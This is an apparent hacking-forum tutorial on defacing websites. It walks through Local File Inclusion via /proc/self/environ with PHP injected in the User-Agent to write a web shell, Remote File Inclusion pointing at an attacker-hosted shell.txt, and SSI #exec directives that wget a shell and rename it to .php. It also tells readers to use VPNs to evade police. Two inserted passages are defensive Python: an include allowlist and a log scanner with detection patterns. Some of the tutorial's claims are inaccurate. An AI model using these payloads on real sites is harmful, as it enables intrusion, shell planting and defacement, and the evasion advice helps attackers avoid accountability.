Table of Contents
Chapter I: Recon
Chapter II: Getting the tools ready
Chapter III: Getting your ass safe
Chapter IV: Local File Inclusion
Chapter V: Remote File Inclusion
Chapter VI: Server Side Inclusion
Chapter VII: Last word
Chapter I: Recon
Alright, imagine this: "You are a Navy SEAL, ready to strike Osama bin Laden's house. But... you haven't prepared any strategy or plan, and you haven't found any flaw in the house's security." I bet you could tell me what's going to happen with the mission: COMPLETE FAILURE.
Always plan, plan and don't forget... plan. Let me briefly explain what I mean by planning. The art of planning is basically gathering information about your target. The information I always collect is: the OS, the CMS it is running, and whether there are any open ports. After I have gathered that information I usually perform a Paros Proxy scan on the site. Basically all it does is scan the site for vulnerabilities and make up a fancy report.
If you want to download and use Paros for yourself, be my guest.
Alright now... I assume that you have the following information:
an idea which ports are open on the target, the operating system, the possible CMS the server is running (not necessary) and your Paros Proxy report. That's basically all the information you need to determine which kind of attack you are going to use against the target.
Chapter II: Tools
Like every job there is, you will need tools.
We hackers need only a very small amount of tools to complete our main goal, which is exploiting that one website you wish to deface.
Alright, throughout this tutorial we are not going to use fancy tools etc.
Instead we will be using these key tools: your brain, your hands and, last but certainly not least... Firefox.
Make sure that you have either HTTP Headers or Tamper Data installed as a Firefox plugin.
Chapter III: Safety
In a world where people hack targets, you have another group of people. I bet you feel this coming... the police.
Trust me on this one: once you start hacking big sites, the police will try to get your ass. But not when we are around. We can outsmart the police by using a VPN. VPN stands for Virtual Private Network. Basically it's a server you can connect to, which will intercept all your packets and make them go through its server. All that it does is hide your real IP.
Some free VPNs are: Cyberghost, VPNreactor and nProx.
Once you move on to the bigger sites, I would highly recommend getting a paid VPN like vpntunnel or anonine.
Chapter IV: Local File Inclusion
Most of you have probably heard about this method once or twice. This is the so called "LFI" exploitation method.
LFI can occur on sites with a URL like this:
Code:
http://site.com/index.php?page=
When you perform an LFI attack you attempt to bypass the server directories to end up at /proc/self/environ. This can be done with ../../../proc/self/environ or if the ../. Useless, you say? WELL, I couldn't disagree more with you on that one. You see, at first sight /proc/self/environ looks like a bunch of shit.
It will look something like this:
Code:
TMPDIR=/var/chroot/home/content/23/8340423/tmp
PHPRC=/var/chroot/home/content/23/8340423/html
TEMP=/var/chroot/home/content/23/8340423/tmp
PHP_FCGI_CHILDREN=0
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/web/cgi-bin
SHLVL=0
RAILS_ENV=production
SPI=TRUE
TMP=/var/chroot/home/content/23/8340423/tmp
PHP_FCGI_MAX_REQUESTS=100000
But there is something really cool we can do with this.
We can spawn a shell through this file...
Now I've got your attention, right? Good. To spawn a shell we simply open up Tamper Data and reload the page while we are tampering.
Once you see a little message pop up, click Tamper Data.
Now we will notice a little User-Agent tab.
In there we will type the following code:
PHP Code:
<?php
// File that will be created on the server
$file = fopen("shellname.php", "w+");
// Source the shell is read from (replace with your own link)
$stream = fopen("Link your shell here/shell.txt", "r");
while (!feof($stream)) {
    $shell .= fgets($stream);
}
fwrite($file, $shell);
fclose($file);
?>
Thanks to Legit for that code. Works better than mine with system();
Now once you have done that, click the submit button and your shell should be spawned. To check if it worked go to http://site.com/shell.php and voila.
Chapter V: Remote File Inclusion
I'm not very glad to say it, but this is one of the good exploit methods that has died. There are almost no websites left with this vulnerability. That's because it's so easy to fix and yet so harmful.
I will explain the so called "RFI" briefly.
RFI or remote file inclusion is a technique where you exploit the include() function.
RFI and LFI are quite similar, but there's a catch. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
For example: a site includes PHP scripts in an unprotected manner.
A little bit like this:
PHP Code:
<?php
$color = 'blue';
if (isset($_GET['COLOR'])) {
    $color = $_GET['COLOR'];
}
// The request parameter goes straight into the include path
include($color . '.php');
?>
Now to exploit this we will request the following URL:
Code:
http://site.com/index.php?page=http://yourevilsite.com/shell.txt
Now you are wondering... why the hell did he use a .txt shell?
PHP automatically treats the .txt as .php, which results in a nice shell to own/deface the website.
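The include() shown above and the ../../../proc/self/environ trick from Chapter IV both come down to the same thing: one line, include($color . '.php'), trusting a request parameter. What follows is an added example, not code from this tutorial, that puts the same resolution logic in Python next to a hardened version. The hardened version refuses anything carrying a URL scheme (remote inclusion and PHP stream wrappers), refuses NUL bytes (the %00 truncation trick), accepts only names from an allowlist, and as a backstop checks that the realpath-resolved file stays under the pages directory. PAGES_DIR, ALLOWED_PAGES and the function names are assumptions made for the example; in PHP the equivalent is an in_array() allowlist plus realpath() on the candidate, with allow_url_include left at its default of Off.

```python
import os
from typing import Optional
from urllib.parse import urlsplit

# Constructed for this example: the directory holding includable pages and the
# page names the application actually knows about. Resolving PAGES_DIR up front
# keeps the containment check honest if the path itself goes through a symlink.
PAGES_DIR = os.path.realpath("/var/www/app/pages")
ALLOWED_PAGES = frozenset({"blue", "red", "home"})


def vulnerable_resolve(page_param: str) -> str:
    """Mirror of the tutorial's include($color . '.php'): the request parameter
    is concatenated and handed to the include sink unchanged, so a traversal
    path or a remote URL goes straight through."""
    return page_param + ".php"


def safe_resolve(page_param: str, allowlist=ALLOWED_PAGES) -> Optional[str]:
    """Return the absolute file to include, or None when the request must be refused.

    Checks, from strongest to weakest:
      1. any URL scheme (http://, ftp://, php://, data:) means remote inclusion
         or a stream wrapper: refuse;
      2. a NUL byte is the classic %00 truncation trick: refuse;
      3. with an allowlist, the value must be one of the known page names;
      4. as a backstop (and the only check when allowlist is None), the
         realpath-resolved candidate must sit inside PAGES_DIR.
    """
    if urlsplit(page_param).scheme:
        return None
    if "\x00" in page_param:
        return None
    if allowlist is not None and page_param not in allowlist:
        return None
    candidate = os.path.realpath(os.path.join(PAGES_DIR, page_param + ".php"))
    if not candidate.startswith(PAGES_DIR + os.sep):
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("blue", "../../../proc/self/environ", "http://yourevilsite.com/shell.txt"):
        print(repr(probe), "->", vulnerable_resolve(probe), "| hardened:", safe_resolve(probe))
```

The containment check alone still lets a value such as ../pages/blue through, because it resolves back inside the directory; that is why the allowlist is the primary control and realpath containment only the safety net.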
Chapter VI: Server Side Inclusion
Okay, now we move on to the "harder" methods.
Server Side Inclusion or SSI is an advanced technique that exploits vulnerabilities in the HTML code.
All that this means is that you inject script into HTML forms and that it will result in spawning a shell or doing something worse.
SSI can only be performed on a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is something else to keep in mind: SSI will also work on normal pages, but ONLY when the input is not filtered.
For example we have a little textbox which is vulnerable to SSI.
We can do some nice little commands here, for example:
Code:
<!--#exec cmd="cd \admin\dir" -->
<!--#exec cmd="wget http://www.yoursite.com/youknowwutthisis.txt" -->
I will explain these 2 commands to you for a moment.
The first command lets you browse directories that you can't access without administrator privileges. The second command lets you download your shell onto the website (this is the shit we are interested in).
Then the only thing left for you to do is to locate your file by executing this command:
Code:
<!--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->
This basically finds your shell.txt, converts it to PHP and places it in the directory of your choice.
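Seen from the server side, all three chapters leave the same kind of trace in the web server's access log: traversal sequences and /proc/self/environ in the query string (Chapter IV), a full URL in a parameter value (Chapter V), an <!--#exec directive in a submitted field (Chapter VI), and PHP tags in the User-Agent header (the Tamper Data step). The scanner below is an added example, not part of this tutorial; it parses combined-format log lines (the sample lines are constructed for this example, not real traffic) and reports which rule fired for each request, percent-decoding repeatedly so that double-encoded traversal is caught as well. The rule names and the sample hosts are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" log format, one request per line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# What each chapter of the tutorial leaves behind in the request.
TRAVERSAL = re.compile(r'(?:\.\.[/\\]){2,}')                       # ../../ (Chapter IV)
SENSITIVE = re.compile(r'/proc/self/environ|/etc/passwd', re.I)    # classic LFI read targets
REMOTE_URL = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)            # scheme:// in a value (Chapter V)
SSI_DIRECTIVE = re.compile(r'<!--\s*#\s*(?:exec|include|echo|set|printenv)', re.I)  # Chapter VI
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)                         # code planted via User-Agent

# Constructed sample lines for this example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2011:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2011:13:56:01 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 2048 "-" "<?php /* probe */ ?>"',
    '10.0.0.9 - - [10/Oct/2011:13:56:20 +0000] "GET /index.php?page=http://yourevilsite.com/shell.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2011:13:57:02 +0000] "POST /guestbook.shtml?name=%3C!--%23exec%20cmd%3D%22ls%22%20--%3E HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2011:13:58:44 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so a double-encoded
    %252e%252e%252f is seen the way the application sees it after its own
    decoding step."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target: str, user_agent: str) -> list:
    """Return the names of the rules that fire for one request."""
    reasons = []
    decoded_target = fully_decode(target)
    query_values = [fully_decode(v) for _, v in
                    parse_qsl(urlsplit(target).query, keep_blank_values=True)]

    if TRAVERSAL.search(decoded_target):
        reasons.append("lfi-traversal")
    if SENSITIVE.search(decoded_target):
        reasons.append("lfi-sensitive-file")
    if any(REMOTE_URL.match(v) for v in query_values):
        reasons.append("rfi-remote-url")
    if SSI_DIRECTIVE.search(decoded_target) or SSI_DIRECTIVE.search(user_agent):
        reasons.append("ssi-directive")
    if PHP_TAG.search(user_agent):
        reasons.append("php-code-in-user-agent")
    return reasons


def scan_log(lines) -> dict:
    """Map 1-based line number -> list of rule names, for lines where any rule fires.
    Lines that do not parse as combined format are skipped, not treated as alerts."""
    findings = {}
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        if not match:
            continue
        reasons = classify_request(match.group("target"), match.group("ua"))
        if reasons:
            findings[number] = reasons
    return findings


if __name__ == "__main__":
    for number, reasons in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(reasons)}")
```

Only GET parameters and the User-Agent are visible in a standard access log; a directive posted in a form body, as in the textbox case above, needs the application's own input logging or a web application firewall in front of it. On Apache, Options IncludesNOEXEC keeps SSI but disables the #exec directive that Chapter VI depends on.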
Chapter VII: Last things
Well, this was my little tutorial regarding uncommon forms of attack.
I hope you have learned something from it and I hope to hear your personal experiences with this.
If this helped you, please leave any form of thank you. It's highly appreciated :)